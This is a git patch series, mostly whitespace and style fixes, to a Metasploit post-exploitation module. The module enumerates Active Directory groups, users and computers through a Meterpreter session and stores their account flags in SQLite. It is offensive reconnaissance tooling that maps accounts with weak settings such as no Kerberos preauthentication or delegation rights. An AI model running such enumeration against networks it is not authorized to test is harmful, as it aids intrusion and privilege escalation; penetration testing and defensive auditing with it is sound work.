"(&(objectCategory=person)(objectClass=user)(|(memberOf:1.2.840.113556.1.4.1941:=#{individual_group[0][:value]})(primaryGroupID=#{group_rid})))" - users_in_group = query(users_filter, max_search, users_fields) - + # Perform the ADSI query to retrieve the effective users in each group (recursion) + vprint_status "Retrieving members of #{individual_group[3][:value]}" + users_filter = "(&(objectCategory=person)(objectClass=user)(|(memberOf:1.2.840.113556.1.4.1941:=#{individual_group[0][:value]})(primaryGroupID=#{group_rid})))" + users_in_group = query(users_filter, max_search, users_fields) + grouptype_int = individual_group[7][:value].to_i # Set this here because it is used a lot below sat_int = individual_group[2][:value].to_i - # Add the group to the database + # Add the group to the database # groupType parameter interpretation: https://msdn.microsoft.com/en-us/library/windows/desktop/ms675935(v=vs.85).aspx - sql_param_group = { g_rid: group_rid, - g_distinguishedName: individual_group[0][:value].to_s, - g_sAMAccountType: sat_int, - g_sAMAccountName: individual_group[3][:value].to_s, - g_whenChanged: individual_group[4][:value].to_s, - g_whenCreated: individual_group[5][:value].to_s, - g_description: individual_group[6][:value].to_s, - g_groupType: grouptype_int, - g_adminCount: individual_group[8][:value].to_i, - g_comments: individual_group[9][:value].to_s, + sql_param_group = { g_rid: group_rid, + g_distinguishedName: individual_group[0][:value].to_s, + g_sAMAccountType: sat_int, + g_sAMAccountName: individual_group[3][:value].to_s, + g_whenChanged: individual_group[4][:value].to_s, + g_whenCreated: individual_group[5][:value].to_s, + g_description: individual_group[6][:value].to_s, + g_groupType: grouptype_int, + g_adminCount: individual_group[8][:value].to_i, + g_comments: individual_group[9][:value].to_s, # Specifies a group that is created by the system. g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Post g_GT_GROUP_SECURITY: (grouptype_int & 0x80000000).zero? ? 0 : 1, # The inverse of the flag above. Technically GT_GROUP_SECURITY=0 makes it a distribution # group so this is arguably redundant, but I have included it for ease. It makes a lot more sense - # to set DISTRIBUTION=1 in a query when your mind is on other things to remember that + # to set DISTRIBUTION=1 in a query when your mind is on other things to remember that # DISTRIBUTION is in fact the inverse of SECURITY...:) g_GT_GROUP_DISTRIBUTION: (grouptype_int & 0x80000000).zero? ? 1 : 0, #Now add sAMAccountType constants @@ -137,86 +137,86 @@ class Metasploit3 < Msf::Post g_SAM_APP_BASIC_GROUP: (sat_int==0x40000000) ? 1 : 0, g_SAM_APP_QUERY_GROUP: (sat_int==0x40000001) ? 1 : 0, g_SAM_ACCOUNT_TYPE_MAX: (sat_int==0x7fffffff) ? 1 : 0, - } - run_sqlite_query(db, 'ad_groups', sql_param_group) - - # Go through each group user + } + run_sqlite_query(db, 'ad_groups', sql_param_group) + + # Go through each group user next if users_in_group[:results].empty? - users_in_group[:results].each do |group_user| - user_rid = get_rid(group_user[1][:value]).to_i - print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] - + users_in_group[:results].each do |group_user| + user_rid = get_rid(group_user[1][:value]).to_i + print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] + uac_int = group_user[7][:value].to_i #Set this because it is used so frequently below sat_int = group_user[2][:value].to_i - # Add the group to the database + # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx - sql_param_user = { u_rid: user_rid, - u_distinguishedName: group_user[0][:value].to_s, - u_sAMAccountType: group_user[2][:value].to_i, - u_sAMAccountName: group_user[3][:value].to_s, - u_displayName: group_user[4][:value].to_s, - u_description: group_user[5][:value].to_s, - u_logonCount: group_user[6][:value].to_i, - u_userAccountControl: uac_int, - u_userPrincipalName: group_user[8][:value].to_s, - u_whenChanged: group_user[9][:value].to_s, - u_whenCreated: group_user[10][:value].to_s, - u_primaryGroupID: group_user[11][:value].to_i, - u_badPwdCount: group_user[12][:value].to_i, - u_comments: group_user[13][:value].to_s, - u_title: group_user[14][:value].to_s, - u_accountExpires: group_user[15][:value].to_i, - #Indicates that a given object has had its ACLs changed to a more secure value by the + sql_param_user = { u_rid: user_rid, + u_distinguishedName: group_user[0][:value].to_s, + u_sAMAccountType: group_user[2][:value].to_i, + u_sAMAccountName: group_user[3][:value].to_s, + u_displayName: group_user[4][:value].to_s, + u_description: group_user[5][:value].to_s, + u_logonCount: group_user[6][:value].to_i, + u_userAccountControl: uac_int, + u_userPrincipalName: group_user[8][:value].to_s, + u_whenChanged: group_user[9][:value].to_s, + u_whenCreated: group_user[10][:value].to_s, + u_primaryGroupID: group_user[11][:value].to_i, + u_badPwdCount: group_user[12][:value].to_i, + u_comments: group_user[13][:value].to_s, + u_title: group_user[14][:value].to_s, + u_accountExpires: group_user[15][:value].to_i, + #Indicates that a given object has had its ACLs changed to a more secure value by the #system because it was a member of one of the administrative groups (directly or transitively). - u_adminCount: group_user[16][:value].to_i, + u_adminCount: group_user[16][:value].to_i, #The login script is executed - u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, + u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, #The user account is disabled. - u_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, + u_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, #The home directory is required. - u_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, + u_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, #The account is currently locked out. - u_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, + u_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, #No password is required. u_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, #The user cannot change the password. - u_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, + u_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, #The user can send an encrypted password. - u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, + u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, #This is an account for users whose primary account is in another domain. This account #provides user access to this domain, but not to any domain that trusts this domain. #Also known as a local user account. - u_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, + u_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, #This is a default account type that represents a typical user. - u_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, + u_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, #This is a permit to trust account for a system domain that trusts other domains. - u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, + u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, #This is a computer account for a computer that is a member of this domain. - u_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, + u_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, #This is a computer account for a system backup domain controller that is a member of this domain. - u_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, + u_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, #The password for this account will never expire. - u_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, + u_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, #This is an MNS logon account. - u_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, + u_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, #The user must log on using a smart card. - u_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, + u_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. #Any such service can impersonate a client requesting the service. - u_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, - #The security context of the user will not be delegated to a service even if the service + u_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, + #The security context of the user will not be delegated to a service even if the service #account is set as trusted for Kerberos delegation. - u_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, + u_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. - u_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, + u_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, #This account does not require Kerberos pre-authentication for logon. - u_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, + u_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, #The password has expired - u_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, + u_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, #The account is enabled for delegation. This is a security-sensitive setting; accounts with - #this option enabled should be strictly controlled. This setting enables a service running - #under the account to assume a client identity and authenticate as that user to other remote + #this option enabled should be strictly controlled. This setting enables a service running + #under the account to assume a client identity and authenticate as that user to other remote #servers on the network. u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1, #Now add sAMAccountType constants @@ -231,21 +231,21 @@ class Metasploit3 < Msf::Post u_SAM_APP_BASIC_GROUP: (sat_int==0x40000000) ? 1 : 0, u_SAM_APP_QUERY_GROUP: (sat_int==0x40000001) ? 1 : 0, u_SAM_ACCOUNT_TYPE_MAX: (sat_int==0x7fffffff) ? 1 : 0, - } - run_sqlite_query(db, 'ad_users', sql_param_user) - - # Now associate the user with the group - sql_param_mapping = { user_rid: user_rid, - group_rid: group_rid - } - run_sqlite_query(db, 'ad_mapping', sql_param_mapping) - end - - rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error("Error(Users): #{e.message}") - next - end - end + } + run_sqlite_query(db, 'ad_users', sql_param_user) + + # Now associate the user with the group + sql_param_mapping = { user_rid: user_rid, + group_rid: group_rid + } + run_sqlite_query(db, 'ad_mapping', sql_param_mapping) + end + + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error("Error(Users): #{e.message}") + next + end + end end group_gather.map { |each_group| each_group.join } end @@ -288,52 +288,52 @@ class Metasploit3 < Msf::Post c_description: comp[16][:value].to_s, c_comments: comp[17][:value].to_s, #The login script is executed - c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, + c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, #The user account is disabled. - c_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, + c_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, #The home directory is required. - c_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, + c_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, #The account is currently locked out. - c_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, + c_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, #No password is required. c_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, #The user cannot change the password. - c_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, + c_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, #The user can send an encrypted password. - c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, + c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, #This is an account for users whose primary account is in another domain. This account #provides user access to this domain, but not to any domain that trusts this domain. #Also known as a local user account. - c_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, + c_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, #This is a default account type that represents a typical user. - c_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, + c_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, #This is a permit to trust account for a system domain that trusts other domains. - c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, + c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, #This is a computer account for a computer that is a member of this domain. - c_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, + c_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, #This is a computer account for a system backup domain controller that is a member of this domain. - c_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, + c_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, #The password for this account will never expire. - c_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, + c_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, #This is an MNS logon account. - c_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, + c_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, #The user must log on using a smart card. - c_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, + c_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. #Any such service can impersonate a client requesting the service. - c_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, - #The security context of the user will not be delegated to a service even if the service + c_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, + #The security context of the user will not be delegated to a service even if the service #account is set as trusted for Kerberos delegation. - c_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, + c_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. - c_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, + c_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, #This account does not require Kerberos pre-authentication for logon. - c_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, + c_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, #The password has expired - c_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, + c_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, #The account is enabled for delegation. This is a security-sensitive setting; accounts with - #this option enabled should be strictly controlled. This setting enables a service running - #under the account to assume a client identity and authenticate as that user to other remote + #this option enabled should be strictly controlled. This setting enables a service running + #under the account to assume a client identity and authenticate as that user to other remote #servers on the network. c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1, #Now add the sAMAccountType objects @@ -402,38 +402,38 @@ class Metasploit3 < Msf::Post 'c_operatingSystemVersion TEXT,'\ 'c_whenChanged TEXT,'\ 'c_whenCreated TEXT,'\ - 'c_ADS_UF_SCRIPT INTEGER,'\ - 'c_ADS_UF_ACCOUNTDISABLE INTEGER,'\ - 'c_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ - 'c_ADS_UF_LOCKOUT INTEGER,'\ - 'c_ADS_UF_PASSWD_NOTREQD INTEGER,'\ - 'c_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ - 'c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ - 'c_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ - 'c_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ - 'c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ - 'c_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ - 'c_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ - 'c_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ - 'c_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ - 'c_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ - 'c_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ - 'c_ADS_UF_NOT_DELEGATED INTEGER,'\ - 'c_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ - 'c_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ - 'c_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ - 'c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER,'\ - 'c_SAM_DOMAIN_OBJECT INTEGER,'\ - 'c_SAM_GROUP_OBJECT INTEGER,'\ - 'c_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ - 'c_SAM_ALIAS_OBJECT INTEGER,'\ - 'c_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ - 'c_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ - 'c_SAM_MACHINE_ACCOUNT INTEGER,'\ - 'c_SAM_TRUST_ACCOUNT INTEGER,'\ - 'c_SAM_APP_BASIC_GROUP INTEGER,'\ - 'c_SAM_APP_QUERY_GROUP INTEGER,'\ - 'c_SAM_ACCOUNT_TYPE_MAX INTEGER)' + 'c_ADS_UF_SCRIPT INTEGER,'\ + 'c_ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'c_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'c_ADS_UF_LOCKOUT INTEGER,'\ + 'c_ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'c_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'c_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'c_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 'c_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'c_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'c_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'c_ADS_UF_NOT_DELEGATED INTEGER,'\ + 'c_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'c_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'c_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER,'\ + 'c_SAM_DOMAIN_OBJECT INTEGER,'\ + 'c_SAM_GROUP_OBJECT INTEGER,'\ + 'c_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'c_SAM_ALIAS_OBJECT INTEGER,'\ + 'c_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'c_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'c_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'c_SAM_TRUST_ACCOUNT INTEGER,'\ + 'c_SAM_APP_BASIC_GROUP INTEGER,'\ + 'c_SAM_APP_QUERY_GROUP INTEGER,'\ + 'c_SAM_ACCOUNT_TYPE_MAX INTEGER)' db.execute(sql_table_computers) # Create the table for the AD Groups @@ -457,17 +457,17 @@ class Metasploit3 < Msf::Post 'g_GT_GROUP_SAM_APP_QUERY INTEGER,'\ 'g_GT_GROUP_SECURITY INTEGER,'\ 'g_GT_GROUP_DISTRIBUTION INTEGER,'\ - 'g_SAM_DOMAIN_OBJECT INTEGER,'\ - 'g_SAM_GROUP_OBJECT INTEGER,'\ - 'g_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ - 'g_SAM_ALIAS_OBJECT INTEGER,'\ - 'g_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ - 'g_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ - 'g_SAM_MACHINE_ACCOUNT INTEGER,'\ - 'g_SAM_TRUST_ACCOUNT INTEGER,'\ - 'g_SAM_APP_BASIC_GROUP INTEGER,'\ - 'g_SAM_APP_QUERY_GROUP INTEGER,'\ - 'g_SAM_ACCOUNT_TYPE_MAX INTEGER)' + 'g_SAM_DOMAIN_OBJECT INTEGER,'\ + 'g_SAM_GROUP_OBJECT INTEGER,'\ + 'g_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'g_SAM_ALIAS_OBJECT INTEGER,'\ + 'g_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'g_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'g_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'g_SAM_TRUST_ACCOUNT INTEGER,'\ + 'g_SAM_APP_BASIC_GROUP INTEGER,'\ + 'g_SAM_APP_QUERY_GROUP INTEGER,'\ + 'g_SAM_ACCOUNT_TYPE_MAX INTEGER)' db.execute(sql_table_group) # Create the table for the AD Users @@ -490,38 +490,38 @@ class Metasploit3 < Msf::Post 'u_title TEXT,'\ 'u_whenCreated TEXT,'\ 'u_whenChanged TEXT,'\ - 'u_ADS_UF_SCRIPT INTEGER,'\ - 'u_ADS_UF_ACCOUNTDISABLE INTEGER,'\ - 'u_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ - 'u_ADS_UF_LOCKOUT INTEGER,'\ - 'u_ADS_UF_PASSWD_NOTREQD INTEGER,'\ - 'u_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ - 'u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ - 'u_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ - 'u_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ - 'u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ - 'u_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ - 'u_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ - 'u_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ - 'u_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ - 'u_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ - 'u_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ - 'u_ADS_UF_NOT_DELEGATED INTEGER,'\ - 'u_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ - 'u_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ - 'u_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ - 'u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER,'\ - 'u_SAM_DOMAIN_OBJECT INTEGER,'\ - 'u_SAM_GROUP_OBJECT INTEGER,'\ - 'u_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ - 'u_SAM_ALIAS_OBJECT INTEGER,'\ - 'u_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ - 'u_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ - 'u_SAM_MACHINE_ACCOUNT INTEGER,'\ - 'u_SAM_TRUST_ACCOUNT INTEGER,'\ - 'u_SAM_APP_BASIC_GROUP INTEGER,'\ - 'u_SAM_APP_QUERY_GROUP INTEGER,'\ - 'u_SAM_ACCOUNT_TYPE_MAX INTEGER)' + 'u_ADS_UF_SCRIPT INTEGER,'\ + 'u_ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'u_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'u_ADS_UF_LOCKOUT INTEGER,'\ + 'u_ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'u_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'u_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'u_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 'u_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'u_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'u_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'u_ADS_UF_NOT_DELEGATED INTEGER,'\ + 'u_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'u_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'u_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER,'\ + 'u_SAM_DOMAIN_OBJECT INTEGER,'\ + 'u_SAM_GROUP_OBJECT INTEGER,'\ + 'u_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'u_SAM_ALIAS_OBJECT INTEGER,'\ + 'u_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'u_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'u_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'u_SAM_TRUST_ACCOUNT INTEGER,'\ + 'u_SAM_APP_BASIC_GROUP INTEGER,'\ + 'u_SAM_APP_QUERY_GROUP INTEGER,'\ + 'u_SAM_ACCOUNT_TYPE_MAX INTEGER)' db.execute(sql_table_users) # Create the table for the mapping between the two (membership) From 7ce24969bb70f1efd455dd7c71b5df44aa204355 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 02:02:44 +0000 Subject: [PATCH 122/686] rubocop fixes --- .../windows/gather/ad_groupusers_to_sql.rb | 313 +++++++++--------- 1 file changed, 156 insertions(+), 157 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index b455dccd51..8acb6101fb 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Post # Go through each of the groups and identify the individual users in each group vprint_status "Groups retrieval completed: #{groups[:results].size} group(s)" vprint_status "Retrieving AD Group Membership" - users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount','comments', 'title', 'accountExpires', 'adminCount'] + users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'comments', 'title', 'accountExpires', 'adminCount'] remaining_groups = groups[:results] @@ -75,10 +75,10 @@ class Metasploit3 < Msf::Post threadcount = remaining_groups.count < datastore['THREADS'] ? remaining_groups.count : datastore['THREADS'] # Loop through each of the groups, creating threads where necessary - while(not remaining_groups.nil? and not remaining_groups.empty?) + while !remaining_groups.nil? && !remaining_groups.empty? group_gather = [] 1.upto(threadcount) do - group_gather << framework.threads.spawn("Module(#{self.refname})", false, remaining_groups.shift) do |individual_group| + group_gather << framework.threads.spawn("Module(#{refname})", false, remaining_groups.shift) do |individual_group| begin next if !individual_group || individual_group.empty? || individual_group.nil? @@ -125,18 +125,18 @@ class Metasploit3 < Msf::Post # to set DISTRIBUTION=1 in a query when your mind is on other things to remember that # DISTRIBUTION is in fact the inverse of SECURITY...:) g_GT_GROUP_DISTRIBUTION: (grouptype_int & 0x80000000).zero? 